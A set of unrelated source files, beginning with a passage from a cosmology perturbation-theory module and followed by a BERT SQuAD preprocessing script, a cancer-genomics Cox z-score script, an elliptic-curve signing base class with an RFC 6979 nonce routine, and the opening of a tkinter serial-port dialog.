2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. 
- 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 mu4fac = 1 - 4*l/ksq/self.Ylin + 4*l*(l-1)/(ksq*self.Ylin)**2 bias_integrands[0,:] = self.Xddot + self.Yddot * mu2fac + self.Xloopddot - ksq*self.Xdot**2 + (self.Yloopddot - 2*ksq*self.Xdot*self.Ydot)*mu2fac - ksq*self.Ydot**2*mu4fac - k * (mu1fac * self.Vddot + mu3fac * self.Tddot) # matter bias_integrands[1,:] = 2 * ( self.X10ddot -k*(self.Ulin*self.Xddot + 2*self.Udot*self.Xdot)*mu1fac + self.Y10ddot*mu2fac - k*(self.Ulin*self.Yddot + 2*self.Udot*self.Ydot)*mu3fac ) # b1 bias_integrands[2,:] = self.corlin*self.Xddot + (self.corlin*self.Yddot + 2*self.Udot**2)*mu2fac # b1sq bias_integrands[3,:] = 2 * self.Udot**2 * mu2fac # b2 if self.shear or self.third_order: bias_integrands[4,:] = 2 * (self.Xs2ddot + self.Ys2ddot * mu2fac) # bs # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_spar.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def strace_integrals(self,k): ''' Gives bias contributions to \sigma_\parallel at a given k. ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_strace_components) bias_integrands = np.zeros( (self.num_strace_components,self.N) ) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. 
- 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 bias_integrands[0,:] = (3 * self.Xddot + self.Yddot) + 3 * self.Xloopddot + self.Yloopddot - ksq*self.Xdot**2 - ksq*(self.Ydot**2+2*self.Xdot*self.Ydot)*mu2fac - k * self.kdelta_Wddot * mu1fac # za bias_integrands[1,:] = 2 * ( (3*self.X10ddot + self.Y10ddot) - k*self.Ulin*(3*self.Xddot+self.Yddot)*mu1fac - 2*k*self.Udot*(self.Xdot+self.Ydot)*mu1fac ) # b1 bias_integrands[2,:] = self.corlin*(3*self.Xddot + self.Yddot) + 2*self.Udot**2 # b1sq bias_integrands[3,:] = 2 * self.Udot**2 # b2 if self.shear or self.third_order: bias_integrands[4,:] = 2 * (3*self.Xs2ddot + self.Ys2ddot) if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_strace.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def gamma1_integrals(self,k): ''' Gives bias contributions to Im[\hk_i \hk_j \hk_k \gamma_{ijk}] ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_gamma_components) bias_integrands = np.zeros( (self.num_gamma_components,self.N) ) #zero_lags = np.array([self.sigmadot*self.sigmaddot]) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin mu3fac = mu1fac * (1. 
- 2.*(l-1)/ksq/self.Ylin) # mu3 terms start at j1 so l -> l-1 mu4fac = 1 - 4*l/ksq/self.Ylin + 4*l*(l-1)/(ksq*self.Ylin)**2 bias_integrands[0,:] = self.Vdddot*mu1fac+self.Tdddot*mu3fac + 3*k*(self.Xdot*self.Xddot + (self.Xdot*self.Yddot+self.Ydot*self.Xddot)*mu2fac + self.Ydot*self.Yddot * mu4fac ) # matter bias_integrands[1,:] = (6*self.Udot*(self.Xddot*mu1fac + self.Yddot*mu3fac)) # b1 # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_gamma1.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def gamma2_integrals(self,k): ''' Gives bias contributions to Im[ \hk_i \delta_{jk} \gamma_{ijk} ] ''' ksq = k**2; kcu = k**3 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_gamma_components) bias_integrands = np.zeros( (self.num_gamma_components,self.N) ) #zero_lags = np.array([5*self.sigmadot*self.sigmaddot]) for l in range(self.jn): # l-dep functions mu1fac = (l>0)/(k * self.yq) mu2fac = 1. - 2.*l/ksq/self.Ylin bias_integrands[0,:] = (5*self.Vdddot/3+self.Tdddot)*mu1fac + k*( 5*self.Xdot*self.Xddot+self.Xdot*self.Yddot +(2*self.Xdot*self.Yddot+self.Ydot*(5*self.Xddot+3*self.Yddot) )*mu2fac ) # matter bias_integrands[1,:] = (2*self.Udot*(5*self.Xddot + 3*self.Yddot)*mu1fac) # b1 # multiply by IR exponent if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_gamma2.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def kappa_integrals(self,k): ''' Since kappa_ijkl only involes one term we can just do them all in one go. 
The contractions are (1) \delta_{ij} \delta_{kl} (2) \hk_i \hk_j \delta_{kl} (3)\hk_i \hk_j \hk_k \hk_l where \hk = \hat{k} is the unit vector of k. ''' ksq = k**2; kf = k**4 expon = np.exp(-0.5*ksq * (self.XYlin - self.sigma)) suppress = np.exp(-0.5*ksq *self.sigma) ret = np.zeros(self.num_kappa_components) bias_integrands = np.zeros( (self.num_kappa_components,self.N) ) for l in range(self.jn): # l-dep functions mu2fac = 1. - 2.*l/ksq/self.Ylin mu4fac = 1 - 4*l/ksq/self.Ylin + 4*l*(l-1)/(ksq*self.Ylin)**2 bias_integrands[0,:] = 15 * self.Xddot**2 + 10 * self.Xddot*self.Yddot + 3 * self.Yddot**2 bias_integrands[1,:] = 5 * self.Xddot**2 + self.Xddot*self.Yddot + (7*self.Xddot*self.Yddot + 3*self.Yddot**2)*mu2fac bias_integrands[2,:] = 3 * self.Xddot**2 + 6*self.Xddot*self.Yddot*mu2fac + 3*self.Yddot**2*mu4fac if l == 0: bias_integrands = bias_integrands * expon bias_integrands -= bias_integrands[:,-1][:,None] # note that expon(q = infinity) = 1 else: bias_integrands = bias_integrands * expon * self.yq**l # do FFTLog ktemps, bias_ffts = self.sph_kappa.sph(l, bias_integrands) ret += k**l * interp1d(ktemps, bias_ffts)(k) return 4*suppress*np.pi*ret def make_table(self, kmin = 1e-3, kmax = 3, nk = 100, func_name = 'power'): ''' Make a table of different terms of P(k), v(k), sigma(k) between a given 'kmin', 'kmax' and for 'nk' equally spaced values in log10 of k This is the most time consuming part of the code. 
''' if func_name == 'power': func = self.p_integrals; iis = np.arange(1+self.num_power_components) elif func_name == 'velocity': func = self.v_integrals; iis = self.vii elif func_name == 'spar': func = self.spar_integrals; iis = self.sparii elif func_name == 'strace': func = self.strace_integrals; iis = self.straceii elif func_name == 'gamma1': func = self.gamma1_integrals; iis = self.gii elif func_name == 'gamma2': func = self.gamma2_integrals; iis = self.gii elif func_name == 'kappa': func = self.kappa_integrals; iis = self.kii pktable = np.zeros([nk, self.num_power_components+1-1]) # one column for ks, but last column in power now the counterterm kv = np.logspace(np.log10(kmin), np.log10(kmax), nk) pktable[:, 0] = kv[:] for foo in range(nk): pktable[foo,iis] = func(kv[foo]) return pktable def make_vtable(self, kmin = 1e-3, kmax = 3, nk = 100): self.vktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='velocity') def make_spartable(self, kmin = 1e-3, kmax = 3, nk = 100): self.sparktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='spar') def make_stracetable(self, kmin = 1e-3, kmax = 3, nk = 100): self.stracektable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='strace') def make_gamma1table(self, kmin = 1e-3, kmax = 3, nk = 100): self.gamma1ktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='gamma1') def make_gamma2table(self, kmin = 1e-3, kmax = 3, nk = 100): self.gamma2ktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='gamma2') def make_kappatable(self, kmin = 1e-3, kmax = 3, nk = 100): self.kappaktable = self.make_table(kmin=kmin,kmax=kmax,nk=nk,func_name='kappa') def convert_sigma_bases(self, basis='Legendre'): ''' Function to convert Tr\sigma and \sigma_\par to the desired basis. 
These are: - Legendre sigma = sigma_0 delta_ij + sigma_2 (3 k_i k_j - delta_ij)/2 - Polynomial sigma = sigma_0 delta_ij + sigma_2 k_i k_j - los (line of sight, note that sigma_0 = kpar and sigma_2 = kperp in this case) sigma = sigma_0 k_i k_j + sigma_2 (delta_ij - k_i k_j)/2 ''' if self.sparktable is None or self.stracektable is None: print("Error: Need to compute sigma before changing bases!") return 0 kv = self.sparktable[:,0] if basis == 'Legendre': self.s0 = self.stracektable / 3. self.s2 = self.sparktable - self.s0 self.s0[:,0] = kv; self.s2[:,0] = kv if basis == 'Polynomial': self.s0 = 0.5 * (self.stracektable - self.sparktable) self.s2 = 0.5 * (3 * self.sparktable - self.stracektable) self.s0[:,0] = kv; self.s2[:,0] = kv if basis == 'los': self.s0 = self.sparktable self.s2 = self.stracektable - self.sparktable self.s0[:,0] = kv; self.s2[:,0] = kv def convert_gamma_bases(self, basis='Polynomial'): ''' Translates the contraction of gamma into the polynomial/legendre basis given by Im[gamma] = g3 \hk_i \hk_j \hk_k + g1 (\hk_i \delta{ij} + et cycl) / 3 ''' if self.gamma1ktable is None or self.gamma2ktable is None: print("Error: Need to compute sigma before changing bases!") return 0 kv = self.gamma1ktable[:,0] # Polynomial basis if basis == 'Polynomial': self.g1 = 1.5 * self.gamma2ktable - 1.5 * self.gamma1ktable self.g3 = 2.5 * self.gamma1ktable - 1.5 * self.gamma2ktable if basis == 'Legendre': self.g1 = 0.6 * self.gamma2ktable self.g3 = 2.5 * self.gamma1ktable - 1.5 * self.gamma2ktable #self.g1 = self.g1 + 0.6*self.g3 #self.g3 = 0.4 * self.g3 self.g1[:,0] = kv; self.g3[:,0] = kv def convert_kappa_bases(self, basis='Polynomial'): ''' Translates the contraction of gamma into the polynomial basis given by kappa = kappa0 / 3 * (delta_ij delta_kl + perms) + kappa2 / 6 * (k_i k_j delta_kl + perms) + kappa4 * k_i k_j k_k k_l. 
''' if self.kappaktable is None: print("Error: Need to compute kappa before changing bases!") return 0 self.kv = self.kappaktable[:,0] self.k0 = 3./8 * (self.kappaktable[:,1] - 2*self.kappaktable[:,2] + self.kappaktable[:,3]) self.k2 = 3./4 * (-self.kappaktable[:,1] + 6*self.kappaktable[:,2] - 5*self.kappaktable[:,3]) self.k4 = 1./8 * (3*self.kappaktable[:,1] - 30*self.kappaktable[:,2] + 35*self.kappaktable[:,3]) # the following functions combine all the components into the spectra given some set # of bias parameters shared between P(k), v(k), sigma(k) # these are, in order, b1, b2, bs, alpha, alpha_v, alpha_s, alpha_s2, sn, sv, s0. def combine_bias_terms_vk(self, b1, b2, bs, b3, alpha_v, sv): ''' Combine all the bias terms into one velocity spectrum. Assumes the P(k) table has already been computed. alpha_v, sv = counterterm and stochastic term. ''' arr = self.vktable if self.third_order: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2, b3, b1*b3]) elif self.shear: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2]) else: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2]) try: kv = arr[:,0]; za = self.pktable[:,-1] except: print("Compute the power spectrum table first!") pktemp = np.copy(arr)[:,1:] res = np.sum(pktemp * bias_monomials, axis =1) + alpha_v*kv * za + sv*kv return kv, res def combine_bias_terms_sk(self, b1, b2, bs, b3, alpha_s0, alpha_s2, s0_stoch, basis='Polynomial'): ''' Combine all the bias terms into one velocity dispersion spectrum. Assumes the P(k) table has already been computed. alpha_s0, alpha_s2 = counterterm for s0 and s2, s0_stoch = stochastic term for s0. 
''' self.convert_sigma_bases(basis=basis) if self.third_order: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2, b3, b1*b3]) elif self.shear: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2]) else: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2]) # Do the monopole try: arr = self.s0 kv = arr[:,0]; za = self.pktable[:,-1] except: print("Compute the power spectrum table first!") pktemp = np.copy(arr)[:,1:] s0 = np.sum(pktemp * bias_monomials, axis =1) + alpha_s0 * za + s0_stoch# here the counterterm is a zero lag and just gives P_Zel # and the quadratic arr = self.s2 kv = arr[:,0] pktemp = np.copy(arr)[:,1:] s2 = np.sum(pktemp * bias_monomials, axis =1) + alpha_s2 * za # there's now a counterterm here too! return kv, s0 ,s2 def combine_bias_terms_gk(self, b1, b2, bs, b3, alpha_g1, alpha_g3, basis='Polynomial'): self.convert_gamma_bases(basis=basis) if self.third_order: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2, b3, b1*b3]) elif self.shear: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2, bs, b1*bs, b2*bs, bs**2]) else: bias_monomials = np.array([1, b1, b1**2, b2, b1*b2, b2**2]) # Do the monopole try: arr = self.g1 kv = arr[:,0]; za = self.pktable[:,-1] except: print("Compute the power spectrum table first!") pktemp = np.copy(arr)[:,1:] g1 = np.sum(pktemp * bias_monomials, axis =1) + alpha_g1 * za / kv# here the counterterm is a zero lag and just gives P_Zel # and the quadratic arr = self.g3 kv = arr[:,0] pktemp = np.copy(arr)[:,1:] g3 = np.sum(pktemp * bias_monomials, axis =1) + alpha_g3 * za / za # there's now a counterterm here too! return kv, g1, g3 def combine_bias_terms_kk(self, alpha_k2, k0_stoch): try: kv = self.kv za = self.pktable[:,-1] except: print("Compute spectra first!") return self.kv, self.k0 + k0_stoch, self.k2 + alpha_k2 * za / kv**2, self.k4
#!/usr/bin/env python3
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Script to preprocess the data for BERT."""

import os
import sys
# Make `code.*` imports resolve when the script is run from the repo root.
sys.path.insert(0, os.getcwd())

import argparse
import json
import numpy as np

from code.common import logging
from code.bert.tensorrt.helpers.data_processing import read_squad_json, convert_example_to_features
from code.bert.tensorrt.helpers.tokenization import BertTokenizer


def preprocess_bert(data_dir, model_dir, preprocessed_data_dir):
    """Tokenize SQuAD v1.1 dev examples and dump fixed-size feature arrays.

    Reads ``<data_dir>/squad/dev-v1.1.json``, tokenizes with the BERT vocab
    from ``<model_dir>/bert/vocab.txt``, and writes ``input_ids.npy``,
    ``input_mask.npy`` and ``segment_ids.npy`` (each shaped
    ``(num_features, 384)``, int32) to
    ``<preprocessed_data_dir>/squad_tokenized``.
    """
    # Fixed BERT-SQuAD tokenization parameters (seq length, query cap,
    # sliding-window stride for long documents).
    max_seq_length = 384
    max_query_length = 64
    doc_stride = 128

    output_dir = os.path.join(preprocessed_data_dir, "squad_tokenized")
    os.makedirs(output_dir, exist_ok=True)

    logging.info("Creating tokenizer...")
    tokenizer = BertTokenizer(os.path.join(model_dir, "bert", "vocab.txt"))
    logging.info("Done creating tokenizer.")

    logging.info("Reading SQuAD examples...")
    eval_examples = read_squad_json(os.path.join(data_dir, "squad", "dev-v1.1.json"))
    logging.info("Done reading SQuAD examples.")

    logging.info("Converting examples to features...")
    eval_features = []
    for example in eval_examples:
        # One example may yield several features via the doc_stride window.
        feature = convert_example_to_features(example.doc_tokens, example.question_text,
                                              tokenizer, max_seq_length, doc_stride, max_query_length)
        eval_features.extend(feature)
    logging.info("Done converting examples to features.")

    logging.info("Saving features...")
    eval_features_num = len(eval_features)
    input_ids = np.zeros((eval_features_num, max_seq_length), dtype=np.int32)
    input_mask = np.zeros((eval_features_num, max_seq_length), dtype=np.int32)
    segment_ids = np.zeros((eval_features_num, max_seq_length), dtype=np.int32)
    for idx, feature in enumerate(eval_features):
        # NOTE(review): prints one line per feature (~10k lines for SQuAD dev)
        # — consider throttling or routing through `logging`.
        print(f"Processing {idx}/{eval_features_num}...")
        input_ids[idx, :] = np.array(feature.input_ids, dtype=np.int32)
        input_mask[idx, :] = np.array(feature.input_mask, dtype=np.int32)
        segment_ids[idx, :] = np.array(feature.segment_ids, dtype=np.int32)
    np.save(os.path.join(output_dir, "input_ids.npy"), input_ids)
    np.save(os.path.join(output_dir, "input_mask.npy"), input_mask)
    np.save(os.path.join(output_dir, "segment_ids.npy"), segment_ids)
    logging.info("Done saving features.")


def main():
    """Parse CLI arguments and run the preprocessing pipeline."""
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument(
        "--data_dir", "-d",
        help="Directory containing the input data.",
        default="build/data"
    )
    parser.add_argument(
        "--model_dir", "-m",
        help="Directory containing the models.",
        default="build/models"
    )
    parser.add_argument(
        "--preprocessed_data_dir", "-o",
        help="Output directory for the preprocessed data.",
        default="build/preprocessed_data"
    )
    args = parser.parse_args()
    data_dir = args.data_dir
    model_dir = args.model_dir
    preprocessed_data_dir = args.preprocessed_data_dir

    preprocess_bert(data_dir, model_dir, preprocessed_data_dir)

    print("Done!")


if __name__ == '__main__':
    main()
<reponame>elifesciences-publications/genomic-features-survival<gh_stars>10-100
#!/usr/bin/env python
# encoding: utf-8
'''
Created by <NAME> on 2018-2-12.

Given the copy-number-change sizes files generated from the sister script, calculate z-scores first excluding broad mutations, then excluding focal mutations.

Copyright (c) 2018. All rights reserved.
'''
# NOTE: this script is Python 2 (print statements, dict.keys()[0] below).

import pandas as pd
import numpy as np
import argparse
import sys
import os
import pdb
import collections
import glob
import rpy2
from multiprocessing import Pool

sys.path.append('../common/')
import utilities as util
import analysis
import mutation_base

# Any change larger than 3 million bps is considered a broad change.
FOCAL_CUTOFF = 3e6  # any change larger than 3million bps is a broad change.

def get_options():
  # Parse -i (cnv change size dir), -c (clinical dir), -o (output dir).
  parser = argparse.ArgumentParser(description='CN Change size zscores')
  parser.add_argument('-i', action='store', dest='cnv_change_size_dir')
  parser.add_argument('-c', action='store', dest='clinical_directory')
  parser.add_argument('-o', action='store', dest='output_directory', default='.')
  namespace = parser.parse_args()

  return (namespace.cnv_change_size_dir, namespace.clinical_directory,
          namespace.output_directory)

def calculate_zscores(input_file):
  # Cox z-score for the "patient has a focal change" indicator.
  input_data = pd.read_csv(input_file, index_col=0)
  input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any')
  input_data['focal'] = input_data.continuous_len <= FOCAL_CUTOFF
  input_data['broad'] = input_data.continuous_len > FOCAL_CUTOFF
  # print input_data
  focal_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['focal'])
  focal_zscore['focal_count'] = input_data.focal.sum()
  print focal_zscore
  return focal_zscore

def calculate_broad_change_zscores(input_file):
  # Cox z-score for the "patient has a broad change" indicator.
  input_data = pd.read_csv(input_file, index_col=0)
  input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any')
  input_data['broad'] = input_data.continuous_len > FOCAL_CUTOFF
  # print input_data
  broad_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['broad'])
  broad_zscore['broad_count'] = input_data.broad.sum()
  print broad_zscore
  return broad_zscore

def calculate_broad_change_restricted_zscores(input_file):
  # Same as above but first drops patients that have a focal change,
  # so "broad" is compared only against "no change".
  input_data = pd.read_csv(input_file, index_col=0)
  input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any')
  print input_data.shape
  # ignore patients that have a focal change
  input_data = input_data.drop(input_data[input_data.continuous_len <= FOCAL_CUTOFF].index)
  input_data['broad'] = input_data.continuous_len > FOCAL_CUTOFF
  broad_restricted_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['broad'])
  broad_restricted_zscore['broad_count'] = input_data.broad.sum()
  print broad_restricted_zscore
  return broad_restricted_zscore

def calculate_focal_change_restricted_zscores(input_file):
  # Mirror image: drops patients that have a broad change, so "focal"
  # is compared only against "no change".
  input_data = pd.read_csv(input_file, index_col=0)
  input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any')
  print input_data.shape
  # ignore patients that have a broad change
  input_data = input_data.drop(input_data[input_data.continuous_len > FOCAL_CUTOFF].index)
  print input_data.shape
  input_data['focal'] = input_data.continuous_len <= FOCAL_CUTOFF
  focal_restricted_zscore = analysis.do_cox(input_data.time, input_data.censor, input_data['focal'])
  focal_restricted_zscore['focal_count'] = input_data.focal.sum()
  print focal_restricted_zscore
  return focal_restricted_zscore

def calculate_any_change_zscores(input_file):
  # Cox z-score for "patient has any copy-number change at all"
  # (continuous_len is non-NaN).  This is the variant main() actually runs.
  input_data = pd.read_csv(input_file, index_col=0)
  input_data = input_data.dropna(subset=['time', 'censor', 'copy number'], how='any')
  print input_data.shape
  input_data['any_change'] = ~np.isnan(input_data.continuous_len)
  any_change_zscore = analysis.do_cox(input_data.time, input_data.censor,
                                      input_data['any_change'])
  any_change_zscore['any_change_count'] = input_data.any_change.sum()
  print any_change_zscore
  return any_change_zscore

def unused():
  # NOTE(review): dead code kept for reference.  Everything that defined
  # exclude_broad_zscore / exclude_focal_zscore is commented out, so calling
  # this function would raise NameError at the return statement.
  # exclude_broad = input_data[(input_data.continuous_len <= FOCAL_CUTOFF) |
  #                             np.isnan(input_data.continuous_len)]
  # exclude_broad_zscore = analysis.do_cox(exclude_broad.time,
  #                           exclude_broad.censor, exclude_broad['copy number'])
  # exclude_broad_zscore['included focal count'] = (
  #                           exclude_broad.continuous_len < FOCAL_CUTOFF).sum()
  #
  #
  # exclude_focal = input_data[(input_data.continuous_len > FOCAL_CUTOFF) |
  #                             np.isnan(input_data.continuous_len)]
  # exclude_focal_zscore = analysis.do_cox(exclude_focal.time,
  #                           exclude_focal.censor, exclude_focal['copy number'])
  # exclude_focal_zscore['included broad count'] = (
  #                           exclude_focal.continuous_len >= FOCAL_CUTOFF).sum()
  return {'exclude_broad': exclude_broad_zscore,
          'exclude_focal': exclude_focal_zscore}

def multiprocess_zscores(args):
  # Worker-shaped helper: takes [input_file, cancer_type, gene] so it can be
  # handed to Pool.map (see commented-out Pool usage in main()).
  input_file = args[0]
  cancer_type = args[1]
  gene = args[2]
  zscores = calculate_any_change_zscores(input_file)
  return {cancer_type + '_' + gene: zscores}

def main(argv=None):
  cn_change_size_dir, clinical_dir, outdir = get_options()
  input_files = os.listdir(cn_change_size_dir)
  input_files = util.remove_extraneous_files(input_files)
  input_files = [os.path.join(cn_change_size_dir, i) for i in input_files]

  zscore_inputs = []
  results = []
  for input_file in input_files:
    # File names are expected to look like <cancer_type>_<gene>.<ext>.
    cancer_type = os.path.split(input_file)[1].split('_')[0]
    gene = os.path.split(input_file)[1].split('_')[1].split('.')[0]
    print cancer_type, gene
    # zscore_inputs.append([input_file, cancer_type, gene])
    results.append(multiprocess_zscores([input_file, cancer_type, gene]))
  # Serial execution; the Pool-based parallel path is kept commented out.
  #p = Pool(4)
  #results = p.map(multiprocess_zscores, zscore_inputs)

  with open(os.path.join(outdir, 'cox_any_change_results.csv'), 'w') as out:
    formatstr = '{},{},{},{}\n'
    out.write('Cancer Type,Gene,Z Score,Count\n')
    for cox_dict in results:
      # Each worker returns a single-entry dict keyed "<cancer>_<gene>".
      cancer_type_gene = cox_dict.keys()[0]
      print cancer_type_gene
      print cox_dict[cancer_type_gene]
      d = cox_dict[cancer_type_gene]
      out.write(formatstr.format(cancer_type_gene.split('_')[0],
                                 cancer_type_gene.split('_')[1],
                                 d['z'], d['any_change_count']))

if __name__ == "__main__":
  main()
<gh_stars>1-10
import hmac
import random
from collections import namedtuple

# Simple affine point; both ECDSA signatures (r, s) and curve points reuse it.
Point = namedtuple('Point', ['x', 'y'])


class EllipticCurveBase:
    """ A generic class for elliptic curves and operations on
    them. The curves must be of the form: y^2 = x^3 + a*x + b.

    Subclasses are expected to provide the curve order ``self.n`` and its
    bit length ``self.nlen``, which the nonce helpers below rely on.
    """

    def __init__(self, hash_function):
        # Hash constructor (e.g. hashlib.sha256) used by HMAC in RFC 6979.
        self.hash_function = hash_function

    def is_on_curve(self, p):
        """ Checks whether a point is on the curve.

        Args:
            p (ECPointAffine): Point to be checked

        Returns:
            bool: True if p is on the curve, False otherwise.
        """
        raise NotImplementedError

    def y_from_x(self, x):
        """ Computes the y component corresponding to x.

        Since elliptic curves are symmetric about the x-axis,
        the x component (and sign) is all that is required to determine
        a point on the curve.

        Args:
            x (int): x component of the point.

        Returns:
            tuple: both possible y components of the point.
        """
        raise NotImplementedError

    def gen_key_pair(self, random_generator=random.SystemRandom()):
        """ Generates a public/private key pair.

        Args:
            random_generator (generator): The random generator to use.
        Returns:
            tuple: A private key in the range of 1 to `self.n - 1`
               and an ECPointAffine containing the public key point.
        """
        raise NotImplementedError

    def public_key(self, private_key):
        """ Returns the public (verifying) key for a given private key.

        Args:
            private_key (int): the private key to derive the public key for.

        Returns:
            ECPointAffine: The point representing the public key.
        """
        raise NotImplementedError

    def recover_public_key(self, message, signature, recovery_id=None):
        """ Recovers possibilities for the public key associated with the
        private key used to sign message and generate signature.

        Since there are multiple possibilities (two for curves with
        co-factor = 1), each possibility that successfully verifies the
        signature is returned.

        Args:
            message (bytes): The message that was signed.
            signature (ECPointAffine): The point representing the signature.
            recovery_id (int) (Optional): If provided, limits the valid x and y
               point to only that described by the recovery_id.

        Returns:
            list(ECPointAffine): List of points representing valid public
               keys that verify signature.
        """
        raise NotImplementedError

    def _sign(self, message, private_key, do_hash=True, secret=None):
        # Curve-specific signing primitive; `secret` allows callers to force a
        # particular nonce (used for testing and deterministic signing).
        raise NotImplementedError

    def sign(self, message, private_key, do_hash=True):
        """ Signs a message with the given private key.

        Args:
            message (bytes): The message to be signed
            private_key (int): Integer that is the private key
            do_hash (bool): True if the message should be hashed prior
              to signing, False if not. This should always be left as
              True except in special situations which require doing
              the hash outside (e.g. handling Bitcoin bugs).

        Returns:
            (Point, int): The point (r, s) representing the signature
               and the ID representing which public key possibility is
               associated with the private key being used to sign.
        """
        return self._sign(message, private_key, do_hash)

    def verify(self, message, signature, public_key, do_hash=True):
        """ Verifies that signature was generated with a private key corresponding
        to public key, operating on message.

        Args:
            message (bytes): The message to be signed
            signature (Point): (r, s) representing the signature
            public_key (ECPointAffine): ECPointAffine of the public key
            do_hash (bool): True if the message should be hashed prior
              to signing, False if not. This should always be left as
              True except in special situations which require doing
              the hash outside (e.g. handling Bitcoin bugs).

        Returns:
            bool: True if the signature is verified, False otherwise.
        """
        raise NotImplementedError

    def _nonce_random(self):
        # Cryptographically secure random nonce in [1, n-1).
        return random.SystemRandom().randrange(1, self.n - 1)

    def _nonce_rfc6979(self, private_key, message):
        """ Computes a deterministic nonce (k) for use when signing
        according to RFC6979 (https://tools.ietf.org/html/rfc6979),
        Section 3.2.

        Args:
            private_key (int): The private key.
            message (bytes): A hash of the input message.

        Returns:
            int: A deterministic nonce.
        """
        hash_bytes = 32
        x = private_key.to_bytes(hash_bytes, 'big')
        # Message should already be hashed by the time it gets here,
        # so don't bother doing another hash.
        x_msg = x + message

        # Step b
        V = bytes([0x1] * hash_bytes)

        # Step c
        K = bytes([0x0] * hash_bytes)

        # Step d
        K = hmac.new(K, V + bytes([0]) + x_msg, self.hash_function).digest()

        # Step e
        V = hmac.new(K, V, self.hash_function).digest()

        # Step f
        K = hmac.new(K, V + bytes([0x1]) + x_msg, self.hash_function).digest()

        # Step g
        V = hmac.new(K, V, self.hash_function).digest()

        while True:
            # Step h.1
            T = bytes()

            # Step h.2: generate candidate bytes until we have nlen bits.
            while 8 * len(T) < self.nlen:
                V = hmac.new(K, V, self.hash_function).digest()
                T += V

            # Step h.3
            k = int.from_bytes(T, 'big')
            # NOTE(review): RFC 6979 accepts any k with 1 <= k <= n-1; the
            # strict `k < (self.n - 1)` bound here also rejects k == n-1.
            # That is harmless for security (it just retries) but is slightly
            # narrower than the spec -- confirm it matches test vectors.
            if k >= 1 and k < (self.n - 1):
                return k
            K = hmac.new(K, V + bytes([0]), self.hash_function).digest()
            V = hmac.new(K, V, self.hash_function).digest()
<filename>modal_connection.py
__author__ = 'Tarsier'

import os
import tkinter as tk
from tkinter import *
from tkinter import ttk
from tkinter import simpledialog
from settings import Settings
import serial.tools.list_ports


class ConnectionDialog(simpledialog.Dialog):
    """Modal dialog that lets the user pick a serial port and baud rate.

    Selections are persisted via the Settings helper; `self.OK` records
    whether the dialog was confirmed.
    """

    def body(self, master):
        # Called by simpledialog.Dialog during construction to build the UI.
        self.parent = master
        self.title('Device Connection')
